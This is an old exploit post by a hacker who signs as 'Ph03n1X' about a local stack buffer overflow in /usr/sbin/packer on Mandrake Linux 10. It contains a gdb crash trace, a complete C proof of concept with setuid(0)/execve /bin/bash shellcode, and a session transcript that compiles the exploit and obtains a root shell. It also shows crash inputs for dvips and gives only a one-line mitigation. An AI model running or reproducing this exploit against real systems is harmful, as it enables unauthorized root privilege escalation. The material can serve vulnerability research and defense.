Author : Ph03n1X email : king_purba@yahoo.co.uk site : http://gombong.6te.net/ http://indonesiahack.com I have found local stack overflow in /usr/sbin/packer on my mandrake 10 box This overflow can use to gain root privilidges if /usr/sbin/packer is suid file (by default this file doesn't set to suid :( ) kolor:\>gdb /usr/sbin/packer GNU gdb 6.0-2mdk (Mandrake Linux) Copyright 2003 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-mandrake-linux-gnu"...(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) run `perl -e 'print "A"x2000'` Starting program: /usr/sbin/packer `perl -e 'print "A"x2000'` (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x4009fd49 in _IO_file_fopen () from /lib/tls/libc.so.6 (gdb) i r eax 0x0 0 ecx 0x41414141 1094795585 edx 0x804a008 134520840 ebx 0x40177800 1075279872 esp 0xbfffdb30 0xbfffdb30 ebp 0xbfffdb8c 0xbfffdb8c esi 0x804a008 134520840 edi 0xbfffe7f0 -1073747984 eip 0x4009fd49 0x4009fd49 eflags 0x10246 66118 cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 The following code is PoC for this hole: /* Shellcode using setuid(0) and execve() /bin/bash [SECTION .text] global _start _start: xor eax,eax mov al,23 xor ebx,ebx int 0x80 jmp short ender starter: pop ebx xor eax,eax mov [ebx+9],al mov [ebx+10],ebx mov [ebx+14],eax mov al,11 lea ecx,[ebx+10] lea edx,[ebx+14] int 0x80 ender: call starter db '/bin/bashXAAAABBBB' Tested On mandrake 10 kernel 2.6.3-7mdk */ #include char shellcode[]= "\x31\xc0\xb0\x17\x31\xdb\xcd\x80\xeb\x16\x5b"\ "\x31\xc0\x88\x43\x09\x89\x5b\x0a\x89\x43\x0e"\ "\xb0\x0b\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8"\ "\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61"\ "\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42"; int main(int argc, char *argv[]) { char *env[2] = {shellcode, NULL}; int i; long ret, *addr_ptr; char *buffer, *ptr; buffer = malloc(2000); ret = 0xbffffffa - strlen(shellcode) - strlen("/usr/sbin/packer"); ptr = buffer; addr_ptr = (long *) ptr; for(i=0; i < 2000; i+=4) { *(addr_ptr++) = ret; } buffer[2000-1] = 0; execle("/usr/sbin/packer", "/usr/sbin/packer", buffer, 0, env); free(buffer); return 0; } kolor:\>uname -a Linux wasyucuk 2.6.3-7mdk #1 Wed Mar 17 15:56:42 CET 2004 i686 unknown unknown GNU/Linux kolor:\>ls -l /usr/sbin/packer -rwsr-xr-x 1 root root 3592 Jul 18 2003 /usr/sbin/packer* kolor:\>wget http://gombong.6te.net/tutorial/packerxplo.txt -O packer1.c kolor:\>gcc -o packer1 packer1.c kolor:\>./packer1 ³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿ ³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿ ³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿ [root@wasyucuk sikolor]#id uid=0(root) gid=506(sikolor) groups=506(sikolor),10(wheel) [root@wasyucuk latihan]# Fix: I don't create any patch for this bugs :) Do not set /usr/sbin/packer SUID or SGID Note : Local buffer overflow found in other file likes /usr/bin/dvips and /usr/bin/odvips "segmentation fault" happen when the input of that file equals or more than 1047 kolor:\>/usr/bin/dvips `perl -e 'print "A"x1047'` This is dvips(k) 5.92b Copyright 2002 Radical Eye Software (www.radicaleye.com) /usr/bin/dvips: ! DVI file can't be opened. Segmentation fault kolor:\>/usr/bin/dvips `perl -e 'print "A"x120000'` Segmentation fault kolor:\> Greetz : zhainal, no-profile, all crew indonesiahack, nightlogin